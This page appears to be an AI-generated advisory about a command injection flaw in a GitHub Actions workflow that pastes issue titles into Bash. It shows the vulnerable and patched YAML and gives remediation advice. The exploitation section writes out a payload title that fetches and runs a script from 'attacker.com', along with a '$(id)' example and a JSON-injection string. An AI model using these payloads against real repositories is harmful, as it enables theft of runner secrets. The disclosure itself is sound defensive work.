CVEReports
CVEReports

Automated vulnerability intelligence platform. Comprehensive reports for high-severity CVEs generated by AI.

Product

  • Home
  • Sitemap
  • RSS Feed

Company

  • About
  • Contact
  • Privacy Policy
  • Terms of Service

© 2026 CVEReports. All rights reserved.

Made with love by Amit Schendel & Alon Barad



GHSA-C3XH-98XP-6QHF

GHSA-C3XH-98XP-6QHF: Command Injection via Issue Title in Discord Notification Workflow

Alon Barad
Alon Barad
Software Engineer

Jun 21, 2026·5 min read·14 visits

Executive Summary (TL;DR)

Untrusted GitHub issue and pull request titles are directly interpolated into an inline Bash script within a GitHub Actions workflow, leading to arbitrary OS command injection.

A command injection vulnerability exists in the .github/workflows/discord-issue.yml workflow of the gouef/githubtoplanguages repository. By exploiting literal string interpolation of untrusted issue titles into an inline Bash script, an attacker can execute arbitrary code within the GitHub Actions runner environment. This exposure risks the theft of repository secrets such as the Discord webhook URL.

Vulnerability Overview

The repository gouef/githubtoplanguages integrated a custom GitHub Actions workflow designated for notifying a Discord channel when issues or pull requests are processed. This automation is defined within the workflow file .github/workflows/discord-issue.yml, which triggers on issue opening and closing events.

The core of the functionality relies on a step that constructs a JSON payload containing details of the GitHub event and transmits it to a Discord webhook. Because GitHub Actions workflows run in a privileged virtual environment with access to repository secrets, secure handling of external inputs within these scripts is paramount.

The workflow exposed a significant attack surface by treating untrusted user input—specifically the title of a GitHub issue or pull request—as trusted executable instructions within an inline shell execution step. This architectural design flaw represents a classic input validation failure within an automation context.

Root Cause Analysis

The technical root cause lies in how the GitHub Actions runner processes expressions in inline scripts. Before executing a run block, the workflow runner scans the YAML for double-curly brace expressions and performs literal string replacement with the event payload values.

In the vulnerable workflow configuration, the expression ${{ github.event.issue.title }} was placed directly within double quotes in a Bash variable assignment. When the runner prepared the script for execution, it literally pasted the attacker-supplied issue title string into the shell script file.

Since the shell evaluates variable assignments inside double quotes, any command substitution sequence present in the issue title, such as backticks or dollar-parenthesis syntax, is parsed and executed by the shell. This occurs prior to the execution of the main commands, resulting in direct OS command injection under the permissions of the runner process.

Code Analysis

An examination of the vulnerable code snippet reveals the direct interpolation of the event-driven titles into local variables within the inline execution environment:

- name: Send notification to Discord
  env:
    DISCORD_WEBHOOK: ${{ secrets.DISCORD_WEBHOOK_URL_ISSUE }}
  run: |
    STATUS="${{ github.event.action == 'opened' && '📢 **New Issue**' || '✅ **Issue Closed**' }}"
    ISSUE_TYPE="${{ github.event_name }}"
    ISSUE_TITLE="${{ github.event.issue.title || github.event.pull_request.title }}"
    ISSUE_URL="${{ github.event.issue.html_url || github.event.pull_request.html_url }}"
    AUTHOR="${{ github.actor }}"

If an issue is opened with the title $(id), the pre-processed script executed by the shell contains the literal assignment ISSUE_TITLE="$(id)". When the shell parses this line, the expression $(id) is executed, and its output is stored in the ISSUE_TITLE variable.

The patched version remediates this security gap by removing the direct interpolation from the inline script body entirely. Instead, the runner defines standard process-level environment variables, which do not undergo shell evaluation:

- name: Send notification to Discord
  env:
    DISCORD_WEBHOOK: ${{ secrets.DISCORD_WEBHOOK_URL_ISSUE }}
    ISSUE_TITLE: ${{ github.event.issue.title }}
    ISSUE_URL: ${{ github.event.issue.html_url }}
    AUTHOR: ${{ github.actor }}
  run: |
    STATUS="${{ github.event.action == 'opened' && '📢 **New Issue**' || '✅ **Issue Closed**' }}"
    # Now, $ISSUE_TITLE is evaluated as a standard shell variable

Exploitation Methodology

Exploiting this vulnerability requires minimal administrative access because any authenticated GitHub user can open an issue on a public repository. This satisfies the Low Privileges requirement (PR:L) under the CVSS framework.

To trigger the vulnerability, an attacker submits a new issue with a crafted payload in the title field, such as test $(curl -fsSL http://attacker.com/malicious_script | sh). Once the issue is created, the GitHub Actions platform automatically triggers the workflow, parsing the payload and executing the malicious payload inside the ephemeral runner environment.

While the environment is virtualized and short-lived, it hosts highly sensitive information, including the GitHub runner's access tokens and configured repository secrets. In this specific repository, the runner holds the DISCORD_WEBHOOK_URL_ISSUE secret, which can be easily extracted and exfiltrated during execution.

Secondary Vulnerability: JSON Injection

Even when the shell execution is secured using environment variables, the system remains vulnerable to a secondary security weakness involving JSON injection. The workflow constructs the JSON payload using manual string concatenation inside double quotes within a curl invocation.

If an attacker provides an issue title containing unescaped double quotes, they can break out of the JSON string structure. This allows them to manipulate additional keys in the JSON object, such as the username or content fields of the Discord webhook payload.

To illustrate this, a title like Test\", \"username\": \"Admin Spoofer\" would override the Discord bot name. This architectural weakness underscores the importance of utilizing utility tools like jq to properly serialize data objects rather than manually constructing them using string templates.

Remediation and Best Practices

The primary remediation strategy is to upgrade to version 1.1.4 or apply the security patch shown in commit 157840482e592bd4f8e0617539e73cdbef26f1ac. This patch safely decouples the user-controlled input from the shell parsing context.

For comprehensive protection, developers should always separate code from data in GitHub Actions. This is achieved by mapping all context-based expressions into step-level environment variables before referencing them inside the shell script.

Furthermore, to completely mitigate both command injection and JSON structural manipulation, workflows should leverage specialized tools such as jq for payload assembly. This ensures that all inputs are systematically encoded, preventing both shell escape sequences and syntax corruption within downstream APIs.

Fix Analysis (1)

Technical Appendix

CVSS Score
7.1/ 10
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N

Affected Systems

gouef/githubtoplanguages GitHub Actions Workflows

Affected Versions Detail

Product
Affected Versions
Fixed Version
githubtoplanguages
gouef
< 1.1.41.1.4
AttributeDetail
CWE IDCWE-74 / CWE-78 / CWE-94
Attack VectorNetwork (AV:N)
CVSS v4.0 Score7.1 (High)
Exploit StatusPoC
KEV StatusNot Listed
Affected ComponentGitHub Actions Workflow (.github/workflows/discord-issue.yml)
Ephemeral ImpactArbitrary Command Execution in Runner Environment

MITRE ATT&CK Mapping

T1190Exploit Public-Facing Application
Initial Access
T1059.004Command and Scripting Interpreter: Unix Shell
Execution
CWE-78
Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

References & Sources

  • [1]https://github.com/gouef/githubtoplanguages/security/advisories/GHSA-c3xh-98xp-6qhf
  • [2]https://github.com/gouef/githubtoplanguages/commit/157840482e592bd4f8e0617539e73cdbef26f1ac

Attack Flow Diagram

Press enter or space to select a node. You can then use the arrow keys to move the node around. Press delete to remove it and escape to cancel.
Press enter or space to select an edge. You can then press delete to remove it or escape to cancel.

More Reports

•about 1 hour ago•CVE-2026-70491
6.5

CVE-2026-70491: Source Code Disclosure in Open WebUI Custom Tools

An information disclosure vulnerability in Open WebUI versions 0.10.2 and earlier allows authenticated non-admin users with read-only access (or any authenticated user when a tool is shared publicly) to retrieve the raw Python source code of custom workspace tools. Because these server-side tools commonly contain hardcoded API tokens, credentials, and proprietary logic, the exposure of raw tool source code severely compromises confidentiality and can facilitate wider infrastructure compromise.

Alon Barad
Alon Barad
2 views•5 min read
•about 2 hours ago•CVE-2026-70492
8.7

CVE-2026-70492: Stored Cross-Site Scripting (XSS) via Unescaped KaTeX Render-Error Fallback in Open WebUI

CVE-2026-70492 (also tracked as GHSA-pwxh-7358-jq2x) is a stored Cross-Site Scripting (XSS) vulnerability in Open WebUI versions 0.10.0 through 0.10.x. The flaw arises because engine-level JavaScript stack overflow errors escape KaTeX standard error handling. Svelte's fallback rendering path assigns the raw, unescaped mathematical input string directly to the DOM using the unsafe {@html} directive, enabling arbitrary client-side code execution. This allows attackers to steal session tokens and perform unauthorized administrative actions when users view malicious messages. The vulnerability has been fully resolved in version 0.11.0.

Amit Schendel
Amit Schendel
2 views•10 min read
•about 3 hours ago•CVE-2026-70493
6.5

CVE-2026-70493: Regular Expression Denial of Service (ReDoS) in Open WebUI Knowledge Search

CVE-2026-70493 is a critical Regular Expression Denial of Service (ReDoS) vulnerability affecting Open WebUI from version 0.9.6 up to (but excluding) 0.11.0. An authenticated user can submit a custom, highly complex regular expression pattern to search files within the knowledge base. Because these expressions are compiled and executed synchronously using Python's standard backtracking re module inside an asynchronous event loop, the server becomes unresponsive. A single request is capable of stalling the entire platform, denying access to all concurrent users of the system.

Amit Schendel
Amit Schendel
4 views•7 min read
•about 4 hours ago•CVE-2026-70588
5.0

CVE-2026-70588: Stored Cross-Site Scripting via Universal Import in Ghost CMS

CVE-2026-70588 is a stored Cross-Site Scripting (XSS) vulnerability in Ghost CMS versions 5.26.0 through 6.54.0. The vulnerability exists within the Universal Import feature of the Ghost Admin interface. When processing imported content from third-party platforms such as Revue, the importer fails to sanitize user-controlled HTML tags, rich-text structured JSON, or link fields before rendering them in the Ghost Admin panel and front-end template rendering contexts.

Amit Schendel
Amit Schendel
7 views•7 min read
•about 5 hours ago•CVE-2026-53948
5.4

CVE-2026-53948: Stored Cross-Site Scripting via File Upload Content-Type Spoofing in Ghost

CVE-2026-53948 is a stored cross-site scripting (XSS) vulnerability in the Ghost content management system. Affected versions (v6.19.4 up to v6.21.0) trusted the client-supplied Content-Type header during file uploads via the Admin API. This allowed authenticated attackers to upload benignly-named files with executable MIME types (like text/html), executing scripts in visitor browsers when hosted on integrated cloud platforms like S3 or GCS.

Alon Barad
Alon Barad
5 views•6 min read
•about 6 hours ago•CVE-2026-70589
4.8

CVE-2026-70589: Improper Status Validation in Ghost CMS Offer Redemption

A business logic vulnerability in Ghost CMS allows unauthenticated remote users to redeem deactivated or archived promotional subscription offers by programmatically passing old offer identifiers during the checkout session initialization.

Alon Barad
Alon Barad
4 views•6 min read